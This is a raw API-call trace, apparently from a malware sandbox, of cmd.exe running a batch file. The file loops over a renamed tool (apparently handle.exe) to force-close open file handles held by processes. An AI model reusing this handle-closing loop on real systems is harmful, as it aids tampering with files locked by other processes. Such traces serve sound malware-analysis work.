GetProcessHeap () returned 0x490000 [0190.041] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x56) returned 0x4911b8 [0190.041] GetProcessHeap () returned 0x490000 [0190.041] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0190.043] _tell (_FileHandle=3) returned 78 [0190.043] _close (_FileHandle=3) returned 0 [0190.043] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37ef04 | out: _Buffer="\r\n") returned 2 [0190.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.043] GetFileType (hFile=0x7) returned 0x2 [0190.044] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec4 | out: lpMode=0x37eec4) returned 1 [0190.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.044] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37eef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37eef0*=0x2) returned 1 [0190.046] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0190.046] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0190.046] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x37ef00 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0190.046] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x37ef00 | out: _Buffer=">") returned 1 [0190.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.046] GetFileType (hFile=0x7) returned 0x2 [0190.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec8 | out: lpMode=0x37eec8) returned 1 [0190.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.047] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37eef4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x37eef4*=0x26) returned 1 [0190.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.048] GetFileType (hFile=0x7) returned 0x2 [0190.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f14c | out: lpMode=0x37f14c) returned 1 [0190.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.049] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x490d40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f178, lpReserved=0x0 | out: lpBuffer=0x490d40*, lpNumberOfCharsWritten=0x37f178*=0x2) returned 1 [0190.049] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f184 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0190.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.049] GetFileType (hFile=0x7) returned 0x2 [0190.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0190.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.050] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x2d) returned 1 [0190.052] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37f1a4 | out: _Buffer="\r\n") returned 2 [0190.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.052] GetFileType (hFile=0x7) returned 0x2 [0190.052] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f164 | out: lpMode=0x37f164) returned 1 [0190.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.053] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f190, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f190*=0x2) returned 1 [0190.054] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0190.054] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0190.054] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0190.055] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0190.055] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0190.055] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0190.055] GetConsoleTitleW (in: lpConsoleTitle=0x37ed14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.055] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0190.055] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0190.056] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x37ead0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x37eac8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x37eac8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0190.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37e86c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0190.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x37e86c, lpFilePart=0x37e868 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x37e868*=0x0) returned 0x26 [0190.056] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0190.056] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37e5e8 | out: lpFindFileData=0x37e5e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4a6370 [0190.056] FindClose (in: hFindFile=0x4a6370 | out: hFindFile=0x4a6370) returned 1 [0190.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37e5e8 | out: lpFindFileData=0x37e5e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4a6370 [0190.057] FindClose (in: hFindFile=0x4a6370 | out: hFindFile=0x4a6370) returned 1 [0190.057] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0190.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37e5e8 | out: lpFindFileData=0x37e5e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4a6370 [0190.057] FindClose (in: hFindFile=0x4a6370 | out: hFindFile=0x4a6370) returned 1 [0190.057] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0190.057] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0190.057] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0190.057] GetProcessHeap () returned 0x490000 [0190.057] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4aa188 | out: hHeap=0x490000) returned 1 [0190.057] GetEnvironmentStringsW () returned 0x4a6b80* [0190.057] GetProcessHeap () returned 0x490000 [0190.057] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb7a) returned 0x4a7f30 [0190.057] FreeEnvironmentStringsW (penv=0x4a6b80) returned 1 [0190.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0190.057] GetProcessHeap () returned 0x490000 [0190.057] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6310 | out: hHeap=0x490000) returned 1 [0190.057] GetProcessHeap () returned 0x490000 [0190.058] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a62b0 | out: hHeap=0x490000) returned 1 [0190.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.058] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0190.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.716] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0190.717] SetConsoleInputExeNameW () returned 0x1 [0190.717] GetConsoleOutputCP () returned 0x1b5 [0190.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0190.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x37f14c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0190.719] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0190.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0190.720] GetProcessHeap () returned 0x490000 [0190.720] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6240 | out: hHeap=0x490000) returned 1 [0190.720] GetProcessHeap () returned 0x490000 [0190.720] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a61d0 | out: hHeap=0x490000) returned 1 [0190.720] GetProcessHeap () returned 0x490000 [0190.720] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6160 | out: hHeap=0x490000) returned 1 [0190.720] GetProcessHeap () returned 0x490000 [0190.720] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a60f0 | out: hHeap=0x490000) returned 1 [0190.720] GetProcessHeap () returned 0x490000 [0190.720] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d38 | out: hHeap=0x490000) returned 1 [0190.720] GetProcessHeap () returned 0x490000 [0190.720] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491218 | out: hHeap=0x490000) returned 1 [0190.720] GetProcessHeap () returned 0x490000 [0190.721] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911b8 | out: hHeap=0x490000) returned 1 [0190.721] GetProcessHeap () returned 0x490000 [0190.721] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491140 | out: hHeap=0x490000) returned 1 [0190.721] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.721] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0190.721] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f130, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f130*=0x94, lpOverlapped=0x0) returned 1 [0190.721] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0190.722] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.722] GetFileType (hFile=0x78) returned 0x1 [0190.722] _get_osfhandle (_FileHandle=3) returned 0x78 [0190.722] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0190.722] GetProcessHeap () returned 0x490000 [0190.722] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4b4aa8 [0190.723] GetProcessHeap () returned 0x490000 [0190.723] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4b8ac0 [0190.723] GetProcessHeap () returned 0x490000 [0190.723] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe) returned 0x490d38 [0190.723] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"Seyes.jtp\"") returned 0xb [0190.723] GetProcessHeap () returned 0x490000 [0190.724] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d38 | out: hHeap=0x490000) returned 1 [0190.724] GetProcessHeap () returned 0x490000 [0190.724] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b8ac0 | out: hHeap=0x490000) returned 1 [0190.724] GetProcessHeap () returned 0x490000 [0190.724] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0190.736] _tell (_FileHandle=3) returned 226 [0190.736] _close (_FileHandle=3) returned 0 [0190.736] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37ef04 | out: _Buffer="\r\n") returned 2 [0190.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.736] GetFileType (hFile=0x7) returned 0x2 [0190.736] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.737] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec4 | out: lpMode=0x37eec4) returned 1 [0190.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.737] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37eef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37eef0*=0x2) returned 1 [0191.383] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0191.383] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0191.383] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x37ef00 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0191.384] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x37ef00 | out: _Buffer=">") returned 1 [0191.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.384] GetFileType (hFile=0x7) returned 0x2 [0192.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.508] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec8 | out: lpMode=0x37eec8) returned 1 [0192.509] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.509] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37eef4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x37eef4*=0x26) returned 1 [0192.510] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x37f184 | out: _Buffer="FOR") returned 3 [0192.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.511] GetFileType (hFile=0x7) returned 0x2 [0192.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.511] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0192.512] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.512] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x3) returned 1 [0192.512] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x37f184 | out: _Buffer=" /F") returned 3 [0192.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.513] GetFileType (hFile=0x7) returned 0x2 [0192.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0192.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.514] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x3) returned 1 [0192.514] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x37f184 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0192.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.515] GetFileType (hFile=0x7) returned 0x2 [0192.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.515] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0192.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x20) returned 1 [0192.516] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x37f184 | out: _Buffer=" %I IN ") returned 7 [0192.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.516] GetFileType (hFile=0x7) returned 0x2 [0192.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.517] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0192.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.518] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x7) returned 1 [0192.519] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x37f180 | out: _Buffer="(`tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner`) DO ") returned 54 [0192.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.519] GetFileType (hFile=0x7) returned 0x2 [0192.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.520] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f140 | out: lpMode=0x37f140) returned 1 [0192.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.520] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x37f16c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f16c*=0x36) returned 1 [0192.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.521] GetFileType (hFile=0x7) returned 0x2 [0192.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.521] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f14c | out: lpMode=0x37f14c) returned 1 [0192.522] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.522] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x37f178, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x37f178*=0x1) returned 1 [0192.523] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.523] GetFileType (hFile=0x7) returned 0x2 [0192.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.523] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f130 | out: lpMode=0x37f130) returned 1 [0192.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.524] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x491250*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x37f15c, lpReserved=0x0 | out: lpBuffer=0x491250*, lpNumberOfCharsWritten=0x37f15c*=0xc) returned 1 [0192.524] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f168 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0192.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.524] GetFileType (hFile=0x7) returned 0x2 [0192.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.525] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f128 | out: lpMode=0x37f128) returned 1 [0192.526] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.526] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37f154, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f154*=0x26) returned 1 [0192.526] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f184 | out: _Buffer=") ") returned 2 [0192.526] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.526] GetFileType (hFile=0x7) returned 0x2 [0192.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0192.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.527] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x2) returned 1 [0192.528] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37f1a4 | out: _Buffer="\r\n") returned 2 [0192.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.528] GetFileType (hFile=0x7) returned 0x2 [0192.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.529] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f164 | out: lpMode=0x37f164) returned 1 [0192.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.529] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f190, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f190*=0x2) returned 1 [0192.530] GetProcessHeap () returned 0x490000 [0192.530] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x2c) returned 0x4a6288 [0192.530] GetProcessHeap () returned 0x490000 [0192.530] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xc) returned 0x490d38 [0192.530] GetProcessHeap () returned 0x490000 [0192.530] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xc) returned 0x490d50 [0192.530] GetProcessHeap () returned 0x490000 [0192.530] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe) returned 0x490d68 [0192.530] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0192.531] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0192.531] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0192.531] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0192.531] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0192.531] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0192.531] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0192.531] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x37f0c0, _Radix=0 | out: _EndPtr=0x37f0c0*=",6 delims=: \"") returned 3 [0192.531] wcstol (in: _String="6 delims=: \"", _EndPtr=0x37f0c0, _Radix=0 | out: _EndPtr=0x37f0c0*=" delims=: \"") returned 6 [0192.531] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0192.531] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0192.531] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0192.531] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0192.531] GetProcessHeap () returned 0x490000 [0192.531] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d68 | out: hHeap=0x490000) returned 1 [0192.531] GetProcessHeap () returned 0x490000 [0192.531] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe) returned 0x490d68 [0192.532] GetProcessHeap () returned 0x490000 [0192.532] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x490d38, Size=0xe) returned 0x490d80 [0192.532] GetProcessHeap () returned 0x490000 [0192.532] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x490d80) returned 0xe [0192.532] GetProcessHeap () returned 0x490000 [0192.532] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x490d50, Size=0x14) returned 0x4a62c0 [0192.532] GetProcessHeap () returned 0x490000 [0192.532] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a62c0) returned 0x14 [0192.532] _wpopen (_Command="tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner", _Mode="rb") returned 0x77032960 [0192.556] feof (_File=0x77032960) returned 